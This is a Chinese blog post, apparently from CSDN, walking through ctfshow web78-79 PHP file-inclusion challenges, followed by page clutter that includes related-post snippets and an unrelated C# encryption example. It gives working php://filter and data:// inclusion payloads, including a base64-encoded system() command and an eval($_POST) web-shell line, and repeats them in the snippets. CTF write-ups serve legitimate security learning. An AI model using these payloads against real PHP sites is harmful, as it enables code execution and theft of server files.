文件包含 78-79

最新推荐文章于 2024-09-19 09:21:20 发布
最新推荐文章于 2024-09-19 09:21:20 发布
阅读量3.1k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58519918/article/details/123998732
版权

web78

没有什么绕过。?file=php://filter/convert.base64-encode/resource=flag.php构建这个伪协议之后可以得到flag,   

首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

    通过传递这个参数可以得到index.php的源码,下面说说为什么,看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的源码。

而include的内容是由用户控制的,所以通过我们传递的file参数,是include()函数引入了index.php的base64编码格式,因为是base64编码格式,所以执行不成功,返回源码,所以我们得到了源码的base64格式,解码即可。

之后我们构建flag.php然后因为使base64形式的所以无法成功读取就返回他的源码形式,之后我们在对他的源码形式进行解码就可以得到里面的数据。

web(79)

/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

<?php system(“tac flag.php”);?>这是后面的含义

【https://blog.csdn.net/cosmoslin/article/details/120695429】这是data协议的。

他将php替换成了三个问号,这里可以使用data协议【数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。】来进行大小写绕过这个函数从而使其函数失去作用,然后,就进行include函数,会运行其中的函数,就是包含和运行。

PHP Include 文件include相关介绍,

还有另一种的形式是?file=data://text/plain,<?=eval($_POST[1]);?>

post:   1=system(“tac flag.php”);

来摔锅
关注
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1879
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
文件包含&CTFshow78-117关
m0_63917373的博客
11-08 671
CTFSHOW 文件包含
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1784
ctfshow学习记录-web入门(文件包含web78-87)
php文件包含-CTFshow-web79
读万卷书,行万里路。
07-26 485
0 前言 在上一篇文章,我们尝试 5 种协议来实现文件包含。但在 web79 中,代码使用 str_replace 函数将字符串中的 php 替换成 ??? ,所以我们要尽可能的避免使用关键字 php。 1 file:// 或 不使用协议 方法同 php文件包含-CTFshow-web78 。 2 http:// 在上一篇文章中,使用的链接为 https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval.php,在链接的尾部含有 php 关键字,无法直接
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2721
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4202
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow 文件包含 web 78 -117
shinygod的博客
02-27 1485
目录web 78web 79web 80web 81web 82 web 78 data://text/plain,<?php system("cat flag.php");?> php://filter/convert.base64-encode/resource=flag.php web 79 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= //PD9waHAgc3lzdGVtKCdjYXQgZmx
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4726
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
ctfshow 文件包含漏洞 web78-88 (更新中)
ljc13626678577的博客
07-12 1069
ctfshow文件包含漏洞 以及一些食用干活总结 目前仍在更新中
fastjson-1.2.78-API文档-中英对照版.zip
05-04
包含翻译后的API文档:fastjson-1.2.78-javadoc-API文档-中文(简体)-英语-对照版.zip; Maven坐标:com.alibaba:fastjson:1.2.78; 标签:alibaba、fastjson、jar包、java、中英对照文档; 使用方法:解压翻译后的...
UD09445B_海康威视网络硬盘录像机(78NB K系列)操作手册_V3.4.100_20181106.pdf
07-18
海康威视网络硬盘录像机(78NB K系列)操作手册中包含了多个知识点,其中涵盖了产品使用、安全操作、功能配置以及故障排除等方面。以下是从给定文件内容中提取的相关知识点: 1. 用户手册使用声明: - 用户手册为...
[CTFSHOW]文件包含78-88
Huamang的博客
03-07 553
web 78 php伪协议 payload: file=php://filter/read=convert.base64-encode/resource=flag.php web 79 data协议,用base64编码绕过过滤 payload: file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 1120
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 531
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
【农信网-注册/登录安全分析报告】
09-16 1410
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 605
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
国庆旅游高峰期,景区如何利用可视化大屏保障游客安全
最新发布
Leo的博客
09-19 796
国庆假期即将来临,中国文化和旅游部发布的数据显示,今年国庆期间国内旅游市场将迎来爆发式增长,预计出游人次将达到8.96亿,同比增长86%,旅游收入预计将达到7825亿元人民币,同比增长138%。这一繁荣景象无疑给各大景区带来了巨大的客流量和经济收益,但同时也带来了不小的安全管理挑战。在人潮涌动的旅游高峰期,如何确保游客的安全,成为景区管理的重中之重。本文将探讨在国庆旅游高峰期,景区如何利用可视化大屏,通过实时监控、数据分析和智能响应,有效保障游客的安全
网络安全宣传周 | DNS安全威胁与应对措施分享
weixin_53018687的博客
09-12 1222
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
C#读取修改带密码txt的文件
09-11
在C#中读取和修改包含密码或其他敏感信息的txt文件时,你需要确保安全地处理这些数据。通常不会直接将明文密码存储在文本文件中,因为这会增加泄露的风险。但是,如果你确实需要临时存储加密过的密码或者安全的哈希值,这里是一个基本的例子展示如何使用`System.Security.Cryptography`来加密和解密数据: 首先,假设你有一个简单的函数用于加密字符串: ```csharp using System.IO; using System.Security.Cryptography; using System.Text; public static class SecureTextHelper { public static string Encrypt(string clearText, string key) { byte[] encryptedBytes = null; using (Aes aes = Aes.Create()) { Rfc2898DeriveBytes rdb = new Rfc2898DeriveBytes(key, new byte[] { 0x4a, 0x65, 0x78, 0x70, 0x6c, 0x65, 0x20, 0x4b, 0x65, 0x79 }); aes.Key = rdb.GetBytes(aes.KeySize / 8); aes.IV = rdb.GetBytes(aes.BlockSize / 8); ICryptoTransform encryptor = aes.CreateEncryptor(); using (MemoryStream ms = new MemoryStream()) { using (CryptoStream cs = new CryptoStream(ms, encryptor, CryptoStreamMode.Write)) { using (StreamWriter sw = new StreamWriter(cs)) { sw.Write(clearText); } encryptedBytes = ms.ToArray(); } } } return Convert.ToBase64String(encryptedBytes); } // 解密函数同理 public static string Decrypt(string encryptedText, string key) { // 使用相同的加密过程和key解密 // ... } } ``` 然后你可以这样读取和处理文件(假设密码在一行内): ```csharp string filePath = "passwords.txt"; string password = File.ReadAllText(filePath); // 加密密码 string encryptedPassword = SecureTextHelper.Encrypt(password, "yourSecreteKey"); // 将加密后的密码写回文件,注意这里是示例,实际生产环境中应避免写回原文件 File.WriteAllText(filePath, encryptedPassword); // 当需要使用时,再从文件读取并解密 string decryptedPassword = SecureTextHelper.Decrypt(File.ReadAllText(filePath), "yourSecreteKey"); // 确保解密正确,这里仅做演示,不要直接使用在生产环境中 Console.WriteLine($"Decrypted password: {decryptedPassword}"); ``` 记住,上述代码只提供了一个基础的示例,实际应用中,尤其是处理密码这类敏感信息,你应该使用更复杂的加密算法,并采用安全的方式来存储和管理密钥。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值